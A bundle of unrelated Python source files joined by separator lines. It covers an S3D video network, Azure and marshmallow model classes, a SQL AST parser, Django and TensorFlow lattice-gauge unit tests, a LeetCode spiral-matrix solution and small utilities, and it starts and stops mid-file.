seed = seed
landmarks, color = dataset_sampler.sample(n_landmarks, seed = seed)
witnesses, _ = dataset_sampler.sample(n_witnesses, seed=(seed+17))
distances = wl_table(witnesses,landmarks)
pairs = get_pairs_0(distances)
pairs_filtered = get_persistence_pairs(pairs, n_samples)
count_pairings(n_samples, pairs_filtered)
make_plot(landmarks, pairs_filtered, color, name=name)
|
#!/usr/bin/env python3
# Copyright (C) Alibaba Group Holding Limited.
""" S3D/S3DG branch. """
import torch
import torch.nn as nn
from models.base.base_blocks import (
BRANCH_REGISTRY, InceptionBaseConv3D
)
class InceptionBlock3D(nn.Module):
"""
Element constructing the S3D/S3DG.
See models/base/backbone.py L99-186.
Modifed from https://github.com/TengdaHan/CoCLR/blob/main/backbone/s3dg.py.
"""
def __init__(self, cfg, in_planes, out_planes):
super(InceptionBlock3D, self).__init__()
_gating = cfg.VIDEO.BACKBONE.BRANCH.GATING
assert len(out_planes) == 6
assert isinstance(out_planes, list)
[num_out_0_0a,
num_out_1_0a, num_out_1_0b,
num_out_2_0a, num_out_2_0b,
num_out_3_0b] = out_planes
self.branch0 = nn.Sequential(
InceptionBaseConv3D(cfg, in_planes, num_out_0_0a, kernel_size=1, stride=1),
)
self.branch1 = nn.Sequential(
InceptionBaseConv3D(cfg, in_planes, num_out_1_0a, kernel_size=1, stride=1),
BRANCH_REGISTRY.get(cfg.VIDEO.BACKBONE.BRANCH.NAME)(cfg, num_out_1_0a, num_out_1_0b, kernel_size=3, stride=1, padding=1),
)
self.branch2 = nn.Sequential(
InceptionBaseConv3D(cfg, in_planes, num_out_2_0a, kernel_size=1, stride=1),
BRANCH_REGISTRY.get(cfg.VIDEO.BACKBONE.BRANCH.NAME)(cfg, num_out_2_0a, num_out_2_0b, kernel_size=3, stride=1, padding=1),
)
self.branch3 = nn.Sequential(
nn.MaxPool3d(kernel_size=(3, 3, 3), stride=1, padding=1),
InceptionBaseConv3D(cfg, in_planes, num_out_3_0b, kernel_size=1, stride=1),
)
self.out_channels = sum([num_out_0_0a, num_out_1_0b, num_out_2_0b, num_out_3_0b])
self.gating = _gating
if _gating:
self.gating_b0 = SelfGating(num_out_0_0a)
self.gating_b1 = SelfGating(num_out_1_0b)
self.gating_b2 = SelfGating(num_out_2_0b)
self.gating_b3 = SelfGating(num_out_3_0b)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
x3 = self.branch3(x)
if self.gating:
x0 = self.gating_b0(x0)
x1 = self.gating_b1(x1)
x2 = self.gating_b2(x2)
x3 = self.gating_b3(x3)
out = torch.cat((x0, x1, x2, x3), 1)
return out
class SelfGating(nn.Module):
def __init__(self, input_dim):
super(SelfGating, self).__init__()
self.fc = nn.Linear(input_dim, input_dim)
def forward(self, input_tensor):
"""Feature gating as used in S3D-G"""
spatiotemporal_average = torch.mean(input_tensor, dim=[2, 3, 4])
weights = self.fc(spatiotemporal_average)
weights = torch.sigmoid(weights)
return weights[:, :, None, None, None] * input_tensor
@BRANCH_REGISTRY.register()
class STConv3d(nn.Module):
"""
Element constructing the S3D/S3DG.
See models/base/backbone.py L99-186.
Modifed from https://github.com/TengdaHan/CoCLR/blob/main/backbone/s3dg.py.
"""
def __init__(self,cfg,in_planes,out_planes,kernel_size,stride,padding=0):
super(STConv3d, self).__init__()
if isinstance(stride, tuple):
t_stride = stride[0]
stride = stride[-1]
else: # int
t_stride = stride
self.bn_mmt = cfg.BN.MOMENTUM
self.bn_eps = cfg.BN.EPS
self._construct_branch(
cfg,
in_planes,
out_planes,
kernel_size,
stride,
t_stride,
padding
)
def _construct_branch(
self,
cfg,
in_planes,
out_planes,
kernel_size,
stride,
t_stride,
padding=0
):
self.conv1 = nn.Conv3d(in_planes, out_planes, kernel_size=(1,kernel_size,kernel_size),
stride=(1,stride,stride),padding=(0,padding,padding), bias=False)
self.conv2 = nn.Conv3d(out_planes,out_planes,kernel_size=(kernel_size,1,1),
stride=(t_stride,1,1),padding=(padding,0,0), bias=False)
self.bn1=nn.BatchNorm3d(out_planes, eps=self.bn_eps, momentum=self.bn_mmt)
self.bn2=nn.BatchNorm3d(out_planes, eps=self.bn_eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(inplace=True)
# init
self.conv1.weight.data.normal_(mean=0, std=0.01) # original s3d is truncated normal within 2 std
self.conv2.weight.data.normal_(mean=0, std=0.01) # original s3d is truncated normal within 2 std
self.bn1.weight.data.fill_(1)
self.bn1.bias.data.zero_()
self.bn2.weight.data.fill_(1)
self.bn2.bias.data.zero_()
def forward(self,x):
x=self.conv1(x)
x=self.bn1(x)
x=self.relu(x)
x=self.conv2(x)
x=self.bn2(x)
x=self.relu(x)
return x
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ResponseBingMatchingStream(Model):
"""ResponseBingMatchingStream.
:param name:
:type name: str
:param score:
:type score: int
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'score': {'key': 'score', 'type': 'int'},
}
def __init__(self, **kwargs):
super(ResponseBingMatchingStream, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.score = kwargs.get('score', None)
|
class Stack:
def __init__(self):
self.items = []
def is_empty(self):
return self.items == []
def push(self, val):
self.items.append(val)
def pop(self):
if self.is_empty():
return None
return self.items.pop()
def peek(self):
if self.is_empty():
return None
return self.items[-1]
def __len__(self):
return len(self.items)
def size(self):
return len(self)
def print_stack(self):
print(self.items[::-1])
if __name__ == "__main__":
stack = Stack()
stack.push(1)
stack.push(2)
stack.push(3)
print(stack.pop())
stack.print_stack()
print(len(stack), stack.peek(), stack.size())
|
#coding=utf8
from asdl.sql.parser.parser_base import Parser
from asdl.asdl import ASDLGrammar
from asdl.asdl_ast import RealizedField, AbstractSyntaxTree
class ParserV0(Parser):
""" In this version, we eliminate all cardinality ? and restrict that * must have at least one item
"""
def parse_select(self, select_clause: list, select_field: RealizedField):
"""
ignore cases agg(col_id1 op col_id2) and agg(col_id1) op agg(col_id2)
"""
select_clause = select_clause[1] # list of (agg, val_unit)
unit_op_list = ['Unary', 'Minus', 'Plus', 'Times', 'Divide']
agg_op_list = ['None', 'Max', 'Min', 'Count', 'Sum', 'Avg']
for agg, val_unit in select_clause:
if agg != 0: # agg col_id
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Unary'))
col_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name(agg_op_list[agg]))
col_node.fields[0].add_value(int(val_unit[1][1]))
ast_node.fields[0].add_value(col_node)
else: # binary_op col_id1 col_id2
ast_node = self.parse_val_unit(val_unit)
select_field.add_value(ast_node)
def parse_from(self, from_clause: dict, from_field: RealizedField):
"""
Ignore from conditions, since it is not evaluated in evaluation script
"""
table_units = from_clause['table_units']
t = table_units[0][0]
if t == 'table_unit':
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('FromTable'))
tables_field = ast_node.fields[0]
for _, v in table_units:
tables_field.add_value(int(v))
else:
assert t == 'sql'
v = table_units[0][1]
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('FromSQL'))
ast_node.fields[0].add_value(self.parse_sql(v))
from_field.add_value(ast_node)
def parse_groupby(self, groupby_clause: list, having_clause: list, groupby_field: RealizedField):
col_ids = []
for col_unit in groupby_clause:
col_ids.append(col_unit[1]) # agg is None and isDistinct False
if having_clause:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Having'))
col_units_field, having_fields = ast_node.fields
having_fields.add_value(self.parse_conds(having_clause))
else:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('NoHaving'))
col_units_field = ast_node.fields[0]
for col_unit in groupby_clause:
col_units_field.add_value(self.parse_col_unit(col_unit))
groupby_field.add_value(ast_node)
def parse_orderby(self, orderby_clause: list, limit: int, orderby_field: RealizedField):
if limit is None:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Asc')) if orderby_clause[0] == 'asc' \
else AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('Desc'))
else:
ast_node = AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('AscLimit')) if orderby_clause[0] == 'asc' \
else AbstractSyntaxTree(self.grammar.get_prod_by_ctr_name('DescLimit'))
col_units_field = ast_node.fields[0]
for val_unit in orderby_clause[1]:
col_units_field.add_value(self.parse_col_unit(val_unit[1]))
orderby_field.add_value(ast_node) |
from __future__ import unicode_literals
from django.test import override_settings
from mayan.apps.rest_api.tests.base import BaseAPITestCase
from ..classes import Template
TEST_TEMPLATE_RESULT = '<div'
class CommonAPITestCase(BaseAPITestCase):
auto_login_user = False
def _request_content_type_list_api_view(self):
return self.get(viewname='rest_api:content-type-list')
def test_content_type_list_api_view(self):
response = self._request_content_type_list_api_view()
self.assertEqual(response.status_code, 200)
def test_template_detail_anonymous_view(self):
template_main_menu = Template.get(name='menu_main')
response = self.get(path=template_main_menu.get_absolute_url())
self.assertNotContains(
response=response, text=TEST_TEMPLATE_RESULT, status_code=403
)
@override_settings(LANGUAGE_CODE='de')
def test_template_detail_view(self):
self.login_user()
template_main_menu = Template.get(name='menu_main')
response = self.get(path=template_main_menu.get_absolute_url())
self.assertContains(
response=response, text=TEST_TEMPLATE_RESULT, status_code=200
)
|
#!/usr/bin/python
# ==============================================================================
# Author: Tao Li ([email protected])
# Date: May 18, 2015
# Question: 054-Spiral-Matrix
# Link: https://leetcode.com/problems/spiral-matrix/
# ==============================================================================
# Given a matrix of m x n elements (m rows, n columns), return all elements of the matrix in spiral order.
#
# For example,
# Given the following matrix:
#
# [
# [ 1, 2, 3 ],
# [ 4, 5, 6 ],
# [ 7, 8, 9 ]
# ]
#
# You should return [1,2,3,6,9,8,7,4,5].
# ==============================================================================
# Method: Hash Table; If statements for four situations
# Time Complexity: O(n^2)
# Space Complexity: O(n^2)
# ==============================================================================
class Solution:
# @param {integer[][]} matrix
# @return {integer[]}
def spiralOrder(self, matrix):
if not matrix:
return []
elif len(matrix) == 1:
return matrix[0]
dic = {}
for i in range(len(matrix)):
for j in range(len(matrix[0])):
dic[i, j] = 0
counter = 0
stack = []
i = j = 0
direction = 0
while counter < len(matrix) * len(matrix[0]):
stack.append(matrix[i][j])
dic[i, j] = 1
if direction == 0:
if dic.get((i, j+1)) is not None and dic.get((i, j+1)) != 1:
j += 1
else:
direction += 1
i += 1
elif direction == 1:
if dic.get((i+1, j)) is not None and dic.get((i+1, j)) != 1:
i += 1
else:
direction += 1
j -= 1
elif direction == 2:
if dic.get((i, j-1)) is not None and dic.get((i, j-1)) != 1:
j -= 1
else:
direction += 1
i -= 1
elif direction == 3:
if dic.get((i-1, j)) is not None and dic.get((i-1, j)) != 1:
i -= 1
else:
direction += 1
j += 1
counter += 1
direction %= 4
return stack
if __name__ == '__main__':
matrix = [[ 1, 2, 3 ],[ 4, 5, 6 ],[ 7, 8, 9 ]]
# matrix = [[1,2, 3, 4], [5, 6, 7, 8]]
# matrix = [[1,2,3]]
print Solution().spiralOrder(matrix) |
#!/usr/bin/env python3
"""
Normalize
"""
import numpy as np
def normalization_constants(X):
"""
normalizing
"""
m = X.shape[0]
mean = np.sum(X / m, axis=0)
std = np.sqrt(np.sum(((X - mean) ** 2), axis=0) / m)
return mean, std
|
from marshmallow import Schema, fields, validate
class AuthSchema(Schema):
firstname = fields.Str(
required=True,
error_messages={"required": "Firstname is required."},
validate=validate.Length(min=2, max=32),
)
lastname = fields.Str(
required=True,
error_messages={"required": "Lastname is required."},
validate=validate.Length(min=2, max=32),
)
email = fields.Email(
required=True,
error_messages={"required": "Email is required."}
)
password = fields.Str(
required=True,
load_only=True,
error_messages={"required": "Password is required."}
)
class UserSchema(Schema):
id = fields.Int(dump_only=True)
email = fields.Email(
required=True,
error_messages={"required": "Email is required."}
)
password = fields.Str(
required=True,
load_only=True,
validate=validate.Length(min=6),
error_messages={"required": "Password is required."}
)
is_active = fields.Boolean()
is_admin = fields.Boolean()
created_on = fields.DateTime(dump_only=True)
updated_on = fields.DateTime(dump_only=True)
sign_in_count = fields.Int(dump_only=True)
current_sign_in_on = fields.DateTime(dump_only=True)
last_sign_in_on = fields.DateTime(dump_only=True)
current_sign_in_ip = fields.Str(
dump_only=True,
validate=validate.Length(max=32),
)
last_sign_in_ip = fields.Str(
dump_only=True,
validate=validate.Length(max=32),
)
|
import nthmc, ftr
import tensorflow as tf
import tensorflow.keras as tk
import math, os, unittest
import sys
sys.path.append("../lib")
import field, group
class TestGenericStoutSmear(unittest.TestCase):
""" Examples:
def setUp(self):
print('setUp')
def tearDown(self):
print('tearDown')
def test_example(self):
self.assertEqual('foo'.upper(), 'FOO')
self.assertTrue('FOO'.isupper())
self.assertFalse('Foo'.isupper())
s = 'hello world'
self.assertEqual(s.split(), ['hello', 'world'])
# check that s.split fails when the separator is not a string
with self.assertRaises(TypeError):
s.split(2)
"""
def setUp(self):
pi = tf.constant(math.pi, dtype=tf.float64)
op0 = (((1,2,-1,-2), (1,-2,-1,2)),
((1,1,2,-1,-1,-2), (1,1,-2,-1,-1,2), (1,2,-1,-1,-2,1), (1,-2,-1,-1,2,1)))
op1 = (((2,-1,-2,1), (2,1,-2,-1)),
((2,2,-1,-2,-2,1), (2,2,1,-2,-2,-1), (2,-1,-2,-2,1,2), (2,1,-2,-2,-1,2)))
self.testShape = (3,2,6,8)
self.latticeShape = (self.testShape[0],)+self.testShape[2:]
self.testField = tf.random.get_global_generator().uniform(self.testShape, -math.pi, math.pi, dtype=tf.float64)
self.testMask = tf.constant([[1,0,1,0,1,0,1,0],[0,0,0,0,0,0,0,0],[1,0,1,0,1,0,1,0],[0,0,0,0,0,0,0,0],[1,0,1,0,1,0,1,0],[0,0,0,0,0,0,0,0]], dtype=tf.float64)
self.ss = [
ftr.GenericStoutSmear(((0,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op1, [], ftr.Scalar(2)),
]
for i,s in enumerate(self.ss):
s.build(self.testShape)
s.layerCoefficient.xs.assign([1.0+0.1*i, 1.0+0.01*i])
def test_mask(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
self.assertTrue(tf.reduce_all(s.maskUpdate == tf.roll(self.testMask, shift=(i//2,i), axis=(0,1))))
def test_call(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, _, _ = s(self.testField)
m = 1 - s.maskUpdate
self.assertTrue(tf.reduce_all(m*y == m*self.testField))
def test_jacob(self):
v = tf.math.reduce_prod(self.testShape[1:])
for i,s in enumerate(self.ss):
with self.subTest(i=i):
x = self.testField
with tf.GradientTape(persistent=True) as t: # persistent for jacobian without pfor
t.watch(x)
y, ld, _ = s(x)
j = t.batch_jacobian(y, x, experimental_use_pfor=False) # pfor fails for roll op
for b in range(self.testShape[0]):
ldj = 0.
for mu in range(self.testShape[1]):
for x in range(self.testShape[2]):
for y in range(self.testShape[3]):
ldj += tf.math.log(j[b,mu,x,y,mu,x,y])
with self.subTest(b=b):
with self.subTest(test='diagonal'):
self.assertAlmostEqual(ld[b].numpy(), ldj.numpy(), places=14)
with self.subTest(test='full matrix'):
self.assertAlmostEqual(ld[b].numpy(), tf.math.log(tf.linalg.det(tf.reshape(j[b], (v,v)))).numpy(), places=14)
def test_inv(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, l, _ = s(self.testField)
z, m, invIter = s.inv(y)
if invIter >= s.invMaxIter:
tf.print('WARNING: max inverse iteration reached',invIter,'with invMaxIter',s.invMaxIter, summarize=-1)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(z, self.testField)), 1E-28)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(l, -m)), 1E-28)
def test_symmetry_translation(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
sx = tf.roll(self.testField, (2,4), (2,3))
sy, sld, _ = s(sx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, tf.roll(sy, (-2,-4), (2,3)))), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseX(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
sx = tf.reverse(self.testField, [2])
sx = tf.stack([tf.roll(-sx[:,0], -1, 1), sx[:,1]], 1)
if s.linkDir != 1: # first link is on other directions
x0 = s.linkFirst[0]-1
if x0<0:
x0 += s.linkRepeat[0]
sn = ftr.GenericStoutSmear(((x0,s.linkFirst[1]),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient)
else:
sn = s
sy, sld, _ = sn(sx)
sy = tf.reverse(tf.stack([tf.roll(-sy[:,0], 1, 1), sy[:,1]], 1), [2])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseY(self):
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
sx = tf.reverse(self.testField, [3])
sx = tf.stack([sx[:,0], tf.roll(-sx[:,1], -1, 2)], 1)
if s.linkDir != 2: # first link is on other directions
x1 = s.linkFirst[1]-1
if x1<0:
x1 += s.linkRepeat[1]
sn = ftr.GenericStoutSmear(((s.linkFirst[0],x1),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient)
else:
sn = s
sy, sld, _ = sn(sx)
sy = tf.reverse(tf.stack([sy[:,0], tf.roll(-sy[:,1], 1, 2)], 1), [3])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_gauge(self):
G = tf.random.get_global_generator().uniform(self.latticeShape, -math.pi, math.pi, dtype=tf.float64)
u = group.U1Phase
tx = tf.stack(
[u.mul(u.mul(G,self.testField[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
for i,s in enumerate(self.ss):
with self.subTest(i=i):
y, ld, _ = s(self.testField)
ty = tf.stack(
[u.mul(u.mul(G,y[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
sy, sld, _ = s(tx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(u.compatProj(ty), u.compatProj(sy))), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
class TestChain(unittest.TestCase):
def setUp(self):
pi = tf.constant(math.pi, dtype=tf.float64)
op0 = (((1,2,-1,-2), (1,-2,-1,2)),
((1,1,2,-1,-1,-2), (1,1,-2,-1,-1,2), (1,2,-1,-1,-2,1), (1,-2,-1,-1,2,1)))
op1 = (((2,-1,-2,1), (2,1,-2,-1)),
((2,2,-1,-2,-2,1), (2,2,1,-2,-2,-1), (2,-1,-2,-2,1,2), (2,1,-2,-2,-1,2)))
self.testShape = (3,2,6,8)
self.latticeShape = (self.testShape[0],)+self.testShape[2:]
self.testField = tf.random.get_global_generator().uniform(self.testShape, -math.pi, math.pi, dtype=tf.float64)
self.ss = ftr.TransformChain([
ftr.GenericStoutSmear(((0,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op0, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((0,1),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,0),(2,2)), op1, [], ftr.Scalar(2)),
ftr.GenericStoutSmear(((1,1),(2,2)), op1, [], ftr.Scalar(2)),
])
self.ss.build(self.testShape)
for i,s in enumerate(self.ss.chain):
s.layerCoefficient.xs.assign([1.0+0.2*i, 1.0+0.04*i])
def test_jacob(self):
v = tf.math.reduce_prod(self.testShape[1:])
x = self.testField
with tf.GradientTape(persistent=True) as t: # persistent for jacobian without pfor
t.watch(x)
y, ld, _ = self.ss(x)
j = t.batch_jacobian(y, x, experimental_use_pfor=False) # pfor fails for roll op
for b in range(self.testShape[0]):
with self.subTest(b=b):
self.assertAlmostEqual(ld[b].numpy(), tf.math.log(tf.linalg.det(tf.reshape(j[b], (v,v)))).numpy(), places=13)
def test_inv(self):
y, l, _ = self.ss(self.testField)
z, m, invIter = self.ss.inv(y)
if invIter >= self.ss.invMaxIter:
tf.print('WARNING: max inverse iteration reached',invIter,'with invMaxIter',self.ss.invMaxIter, summarize=-1)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(z, self.testField)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(l, -m)), 1E-24)
def test_symmetry_translation(self):
y, ld, _ = self.ss(self.testField)
sx = tf.roll(self.testField, (2,4), (2,3))
sy, sld, _ = self.ss(sx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, tf.roll(sy, (-2,-4), (2,3)))), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseX(self):
y, ld, _ = self.ss(self.testField)
sx = tf.reverse(self.testField, [2])
sx = tf.stack([tf.roll(-sx[:,0], -1, 1), sx[:,1]], 1)
ss = []
for s in self.ss.chain:
if s.linkDir != 1: # first link is on other directions
x0 = s.linkFirst[0]-1
if x0<0:
x0 += s.linkRepeat[0]
ss.append(ftr.GenericStoutSmear(((x0,s.linkFirst[1]),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient))
else:
ss.append(s)
sy, sld, _ = ftr.TransformChain(ss)(sx)
sy = tf.reverse(tf.stack([tf.roll(-sy[:,0], 1, 1), sy[:,1]], 1), [2])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseY(self):
y, ld, _ = self.ss(self.testField)
sx = tf.reverse(self.testField, [3])
sx = tf.stack([sx[:,0], tf.roll(-sx[:,1], -1, 2)], 1)
ss = []
for s in self.ss.chain:
if s.linkDir != 2: # first link is on other directions
x1 = s.linkFirst[1]-1
if x1<0:
x1 += s.linkRepeat[1]
ss.append(ftr.GenericStoutSmear(((s.linkFirst[0],x1),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient))
else:
ss.append(s)
sy, sld, _ = ftr.TransformChain(ss)(sx)
sy = tf.reverse(tf.stack([sy[:,0], tf.roll(-sy[:,1], 1, 2)], 1), [3])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_gauge(self):
G = tf.random.get_global_generator().uniform(self.latticeShape, -math.pi, math.pi, dtype=tf.float64)
u = group.U1Phase
tx = tf.stack(
[u.mul(u.mul(G,self.testField[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
y, ld, _ = self.ss(self.testField)
ty = tf.stack(
[u.mul(u.mul(G,y[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
sy, sld, _ = self.ss(tx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(u.compatProj(ty), u.compatProj(sy))), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
class TestConvChain(TestChain):
def setUp(self):
pi = tf.constant(math.pi, dtype=tf.float64)
op0 = (((1,2,-1,-2), (1,-2,-1,2)),
((1,1,2,-1,-1,-2), (1,1,-2,-1,-1,2), (1,2,-1,-1,-2,1), (1,-2,-1,-1,2,1)))
op1 = (((2,-1,-2,1), (2,1,-2,-1)),
((2,2,-1,-2,-2,1), (2,2,1,-2,-2,-1), (2,-1,-2,-2,1,2), (2,1,-2,-2,-1,2)))
self.testShape = (3,2,8,6)
self.latticeShape = (self.testShape[0],)+self.testShape[2:]
self.testField = tf.random.get_global_generator().uniform(self.testShape, -math.pi, math.pi, dtype=tf.float64)
fixedP = (1,2,-1,-2)
fixedR0 = (2,2,1,-2,-2,-1)
fixedR1 = (1,1,2,-1,-1,-2)
convP0 = lambda: ftr.PeriodicConv((
tk.layers.Conv2D(2, (3,2), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
))
convP1 = lambda: ftr.PeriodicConv((
tk.layers.Conv2D(2, (2,3), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
))
convR = lambda pad: ftr.PeriodicConv((
tk.layers.Conv2D(2, (3,3), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
), pad)
conv = lambda: ftr.PeriodicConv((
tk.layers.Conv2D(2, (3,3), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
tk.layers.Conv2D(2, (3,3), activation=None, kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
))
self.ss = ftr.TransformChain([
ftr.GenericStoutSmear(((0,0),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((0,1),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((1,0),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((1,1),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((0,0),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
ftr.GenericStoutSmear(((0,1),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
ftr.GenericStoutSmear(((1,0),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
ftr.GenericStoutSmear(((1,1),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
])
self.ss.build(self.testShape)
def test_symmetry_reverseX(self):
# need to flip conv layer weights
pass
def test_symmetry_reverseY(self):
# need to flip conv layer weights
pass
if __name__ == '__main__':
tf.random.set_seed(9876543211)
tf.keras.backend.set_floatx('float64')
tf.config.set_soft_device_placement(True)
tf.config.optimizer.set_jit(False)
tf.config.threading.set_inter_op_parallelism_threads(1) # ALCF suggests number of socket
tf.config.threading.set_intra_op_parallelism_threads(4) # ALCF suggests number of physical cores
os.environ["OMP_NUM_THREADS"] = "4"
os.environ["KMP_BLOCKTIME"] = "0"
os.environ["KMP_SETTINGS"] = "1"
os.environ["KMP_AFFINITY"]= "granularity=fine,verbose,compact,1,0"
unittest.main()
|
import json
def build_payload(intent, params={}, contexts=[], action='test_action', query='test query'):
return json.dumps({
"id": "8ea2d357-10c0-40d1-b1dc-e109cd714f67",
"timestamp": "2017-06-26T22:43:14.935Z",
"lang": "en",
"result": {
"action": action,
"actionIncomplete": False,
"contexts": contexts,
"fulfillment": {
"messages": [],
"speech": ""
},
"metadata": {
"intentId": "some-intent-id",
"intentName": intent,
"webhookForSlotFillingUsed": "false",
"webhookUsed": "true"
},
"parameters": params,
"resolvedQuery": query,
"score": 1.0,
"source": "agent",
"speech": ""
},
"status": {
"code": 200,
"errorType": "success"
},
"sessionId": "c24d9cfe-21c9-4fc0-a5eb-1a2ee1fec29c"
})
def get_query_response(client, payload):
resp = client.post('/', data=payload)
assert resp.status_code == 200
return json.loads(resp.data.decode('utf-8'))
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import recurrent, workspace
from caffe2.python.model_helper import ModelHelper
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
class RecurrentNetworkTest(hu.HypothesisTestCase):
@given(T=st.integers(1, 4),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_sum_mul(self, T, n, d):
model = ModelHelper(name='external')
input_blob, initial_input_blob = model.net.AddExternalInputs(
'input', 'initial_input')
step = ModelHelper(name='step', param_model=model)
input_t, output_t_prev = step.net.AddExternalInput(
'input_t', 'output_t_prev')
output_t_internal = step.net.Sum([input_t, output_t_prev])
